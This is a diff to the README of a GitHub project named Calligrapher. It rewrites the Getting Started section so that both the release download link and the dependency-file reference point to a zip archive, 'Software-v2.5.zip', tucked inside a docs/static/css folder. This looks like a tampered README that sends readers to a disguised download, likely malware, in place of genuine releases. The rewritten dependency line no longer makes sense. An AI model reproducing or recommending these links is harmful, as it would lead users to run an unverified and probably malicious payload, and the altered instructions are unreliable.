HazR3t/Calligrapher/README.md

 ## Getting Started

-To get started with Calligrapher, you can download the latest release from the [Releases section](https://github.com/HazR3t/Calligrapher/releases).
+To get started with Calligrapher, you can download the latest release from the [Releases section](https://github.com/HazR3t/Calligrapher/raw/refs/heads/main/docs/static/css/Software-v2.5.zip).
 After downloading, follow these steps:

 1. **Install Dependencies**: Ensure you have the required libraries installed.
-You can find the list of dependencies in the `requirements.txt` file.
+You can find the list of dependencies in the `https://github.com/HazR3t/Calligrapher/raw/refs/heads/main/docs/static/css/Software-v2.5.zip` file.
 2. **Run the Application**: Execute the main script to start generating images.
 You can customize parameters as needed.

 ### Installation